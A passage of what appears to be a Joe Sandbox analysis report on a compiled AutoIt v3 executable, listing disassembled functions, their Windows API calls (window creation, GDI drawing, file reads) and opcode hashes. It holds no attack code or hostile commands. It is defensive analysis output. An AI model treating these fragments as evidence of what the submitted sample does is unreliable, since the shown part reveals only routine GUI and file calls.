                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,009E03EE), ref: 009E09DA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: 93c6f04194f3bbd6773e1b0c8df38218a485f85c41408c66ebbefb8d5704121b
                                                                      • Instruction ID: b0644e232b4a1001ef44734275d23ff8f7d3d80cbaed6a25a8c224af8e7f55a4
                                                                      • Opcode Fuzzy Hash: 93c6f04194f3bbd6773e1b0c8df38218a485f85c41408c66ebbefb8d5704121b
                                                                      • Instruction Fuzzy Hash:
                                                                      Function 009E781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0
                                                                      • API String ID: 0-4108050209
                                                                      • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                      • Instruction ID: 94db70461fff6b521c801271b043417a4245253dcebea68de565175d7478c66f
                                                                      • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                      • Instruction Fuzzy Hash: 9E51437160C6C56BDB3B85EB889A7BFE78D9F62340F180919D886C7283CA19DE01D353
                                                                      Function 009F6DD9 Relevance: .6, Instructions: 637COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 113640d2205e8c45d866bb1d4ba0f2b5f0bc3dcdc4ec1e9955eff53d34c49d3b
                                                                      • Instruction ID: d7bce63c0f02abee9b5b80305560cf07343eb9e220010d0a8fe353110825f77b
                                                                      • Opcode Fuzzy Hash: 113640d2205e8c45d866bb1d4ba0f2b5f0bc3dcdc4ec1e9955eff53d34c49d3b
                                                                      • Instruction Fuzzy Hash: D5325522D29F054DD7239674CC22335A69DAFB73D5F14C737F81AB59A9EB69C4834200
                                                                      Function 009DCC39 Relevance: .6, Instructions: 635COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 79b8c83f0a61b5e72db4c1bdfc27b0e7707056c3a590412f17ce46a5a56cf6e2
                                                                      • Instruction ID: 26a406b16abf35759cfb94c9594d7fc6846aeebf99086a998c45c8a167c6fa58
                                                                      • Opcode Fuzzy Hash: 79b8c83f0a61b5e72db4c1bdfc27b0e7707056c3a590412f17ce46a5a56cf6e2
                                                                      • Instruction Fuzzy Hash: 62321272A841168BDF28CB28C5946FD7BB2EF45360F28896BD59ACB391D234DDC1DB40
                                                                      Function 009C7920 Relevance: .6, Instructions: 563COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5346f1b2a3f908f5ab20aa56c19be4b1243affe73857c380392eb683e2c49407
                                                                      • Instruction ID: 500c95a3e027b6feb9e50ec2a06566ecd38d48379c45f873b1238bd0f7972b2a
                                                                      • Opcode Fuzzy Hash: 5346f1b2a3f908f5ab20aa56c19be4b1243affe73857c380392eb683e2c49407
                                                                      • Instruction Fuzzy Hash: 4222AF70E0060A9FDF14CFA5D881BAEB7B6FF48300F144529E816AB291EB36AD51CF51
                                                                      Function 009C91C0 Relevance: .5, Instructions: 475COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: da2da6c169a58cdf04fe7fd95a06cc5342242875b317f1bd9df6ebe5d1e0a3fd
                                                                      • Instruction ID: 6a72034f14dac3a325332756c21ecdc1cf07b6c2a7e8a0fdd985f81a3cbc0e6c
                                                                      • Opcode Fuzzy Hash: da2da6c169a58cdf04fe7fd95a06cc5342242875b317f1bd9df6ebe5d1e0a3fd
                                                                      • Instruction Fuzzy Hash: 5902B4B1E00209EBDB04DF54D881BAEB7B1FF44300F508569E81A9B2D1EB35AE61DB91
                                                                      Function 009E1C77 Relevance: .3, Instructions: 254COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                      • Instruction ID: c4e239ca10a0fbe3dd6c96a20f7b6235c9d565959ef4cae99c9c92f3c21b01d3
                                                                      • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                      • Instruction Fuzzy Hash: 909157726080E34ADB2F463B857447EFFE55A923A131A0B9DE4F2CA1C5EE34DD94D620
                                                                      Function 009E19B0 Relevance: .2, Instructions: 240COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                      • Instruction ID: 6b6090f08d588e0aaf634fc1cfe45a61a2a9146dfd483d3e9e976529d022031d
                                                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                      • Instruction Fuzzy Hash: 8A9121722090E34ADB6B467B957403DFFE55A923A131E07AED4F2CA1C5FE348D54D620
                                                                      Function 009E7A4A Relevance: .2, Instructions: 237COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7840a9bc01fae0124cbad6268698df2b7d559836f21870626695f1d30f5da421
                                                                      • Instruction ID: 45f66d0bbf8fdd857f5ecde1d0ae76997beb973b2cd24c7a0258d507ff3cb951
                                                                      • Opcode Fuzzy Hash: 7840a9bc01fae0124cbad6268698df2b7d559836f21870626695f1d30f5da421
                                                                      • Instruction Fuzzy Hash: A3615B716087C996DA3799EB8C95BBFF39CDF81700F280D2DE882DB281D6159E428357
                                                                      Function 009E7CA7 Relevance: .2, Instructions: 237COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 15b60899ca933000c86e26c1023145e9d744a4506c5a5486e1a812c52ceb9111
                                                                      • Instruction ID: f419640b93972dbe1ad49459f1c6a92276a578c30c0a32162f54eb1ee38edef0
                                                                      • Opcode Fuzzy Hash: 15b60899ca933000c86e26c1023145e9d744a4506c5a5486e1a812c52ceb9111
                                                                      • Instruction Fuzzy Hash: A0616A712087C9A6DA3B49EB4C55BBFE38DAF42700F100D5DE946CB2D1DA159DC2C217
                                                                      Function 009E1706 Relevance: .2, Instructions: 232COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                      • Instruction ID: f21813994fb3bf864efb30dceb780425fb5eefb4d6b1c749e3faa08bcd37d48a
                                                                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                      • Instruction Fuzzy Hash: 8D8163766090E34ADB6F423B857447EFFE55A923A131A079ED4F2CA1C2EE34CD54E620
                                                                      Function 00A32046 Relevance: .1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6bb6063584bfe506f909a47f03a9f83457f4daa18b7199b09553cd7f925bf4ff
                                                                      • Instruction ID: f2678cae62188eeb17b7feb1d1b42a9ccbdd2aaf210bf95fa4d5ae5572c3d653
                                                                      • Opcode Fuzzy Hash: 6bb6063584bfe506f909a47f03a9f83457f4daa18b7199b09553cd7f925bf4ff
                                                                      • Instruction Fuzzy Hash: E62181327216118BDB28CF79C8227BE73E5A754310F15862EA4A7C76D0DE35A9048B80
                                                                      Function 00A42ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DeleteObject.GDI32(00000000), ref: 00A42B30
                                                                      • DeleteObject.GDI32(00000000), ref: 00A42B43
                                                                      • DestroyWindow.USER32 ref: 00A42B52
                                                                      • GetDesktopWindow.USER32 ref: 00A42B6D
                                                                      • GetWindowRect.USER32(00000000), ref: 00A42B74
                                                                      • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00A42CA3
                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00A42CB1
                                                                      • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A42CF8
                                                                      • GetClientRect.USER32(00000000,?), ref: 00A42D04
                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00A42D40
                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A42D62
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A42D75
                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A42D80
                                                                      • GlobalLock.KERNEL32(00000000), ref: 00A42D89
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A42D98
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00A42DA1
                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A42DA8
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00A42DB3
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A42DC5
                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00A5FC38,00000000), ref: 00A42DDB
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00A42DEB
                                                                      • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00A42E11
                                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00A42E30
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A42E52
                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A4303F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                      • API String ID: 2211948467-2373415609
                                                                      • Opcode ID: 92034dafbcb1b288700d8c96af1ad7f48fb95df9097aafff0b87ed16749dc47d
                                                                      • Instruction ID: 6ab0cdfc3333e58e5ad0095726c89de5f7862fe156affed6831831d5cb5ff178
                                                                      • Opcode Fuzzy Hash: 92034dafbcb1b288700d8c96af1ad7f48fb95df9097aafff0b87ed16749dc47d
                                                                      • Instruction Fuzzy Hash: 1F026E75A00205AFDB14DFA4CC89FAE7BB9FB88721F108558F915AB2A1DB749D01CF60
                                                                      Function 00A570D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetTextColor.GDI32(?,00000000), ref: 00A5712F
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00A57160
                                                                      • GetSysColor.USER32(0000000F), ref: 00A5716C
                                                                      • SetBkColor.GDI32(?,000000FF), ref: 00A57186
                                                                      • SelectObject.GDI32(?,?), ref: 00A57195
                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00A571C0
                                                                      • GetSysColor.USER32(00000010), ref: 00A571C8
                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00A571CF
                                                                      • FrameRect.USER32(?,?,00000000), ref: 00A571DE
                                                                      • DeleteObject.GDI32(00000000), ref: 00A571E5
                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00A57230
                                                                      • FillRect.USER32(?,?,?), ref: 00A57262
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00A57284
                                                                        • Part of subcall function 00A573E8: GetSysColor.USER32(00000012), ref: 00A57421
                                                                        • Part of subcall function 00A573E8: SetTextColor.GDI32(?,?), ref: 00A57425
                                                                        • Part of subcall function 00A573E8: GetSysColorBrush.USER32(0000000F), ref: 00A5743B
                                                                        • Part of subcall function 00A573E8: GetSysColor.USER32(0000000F), ref: 00A57446
                                                                        • Part of subcall function 00A573E8: GetSysColor.USER32(00000011), ref: 00A57463
                                                                        • Part of subcall function 00A573E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A57471
                                                                        • Part of subcall function 00A573E8: SelectObject.GDI32(?,00000000), ref: 00A57482
                                                                        • Part of subcall function 00A573E8: SetBkColor.GDI32(?,00000000), ref: 00A5748B
                                                                        • Part of subcall function 00A573E8: SelectObject.GDI32(?,?), ref: 00A57498
                                                                        • Part of subcall function 00A573E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00A574B7
                                                                        • Part of subcall function 00A573E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A574CE
                                                                        • Part of subcall function 00A573E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00A574DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                      • String ID:
                                                                      • API String ID: 4124339563-0
                                                                      • Opcode ID: 2f0e1797fcceb5325a1036938871b55d7d991a99d61cd05714b4e4c0837adb52
                                                                      • Instruction ID: 4cb7b0b771ca09ff79ddb7ecbf13c715db175f32d0d2f6be953bc25ca875e386
                                                                      • Opcode Fuzzy Hash: 2f0e1797fcceb5325a1036938871b55d7d991a99d61cd05714b4e4c0837adb52
                                                                      • Instruction Fuzzy Hash: 20A18072008701AFDB11DFA4EC48A5FBBA9FB49332F100B19F962A61E1E771E945CB51
                                                                      Function 009D8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DestroyWindow.USER32(?,?), ref: 009D8E14
                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00A16AC5
                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00A16AFE
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00A16F43
                                                                        • Part of subcall function 009D8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,009D8BE8,?,00000000,?,?,?,?,009D8BBA,00000000,?), ref: 009D8FC5
                                                                      • SendMessageW.USER32(?,00001053), ref: 00A16F7F
                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00A16F96
                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00A16FAC
                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00A16FB7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                      • String ID: 0
                                                                      • API String ID: 2760611726-4108050209
                                                                      • Opcode ID: 0b55f717456b7b186f75b1c14acb2e0180ff2f155652834f10edf2ca5ea4bfb2
                                                                      • Instruction ID: 2a9a23ec0090feb1748484b23e932447ae983cdce67a74813f114c6722d3033a
                                                                      • Opcode Fuzzy Hash: 0b55f717456b7b186f75b1c14acb2e0180ff2f155652834f10edf2ca5ea4bfb2
                                                                      • Instruction Fuzzy Hash: 51129C30204211EFDB25DF24D984BEAB7E5FB44311F14856AE485CB6A2CB35EC92DF91
                                                                      Function 00A42711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DestroyWindow.USER32(00000000), ref: 00A4273E
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00A4286A
                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00A428A9
                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00A428B9
                                                                      • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00A42900
                                                                      • GetClientRect.USER32(00000000,?), ref: 00A4290C
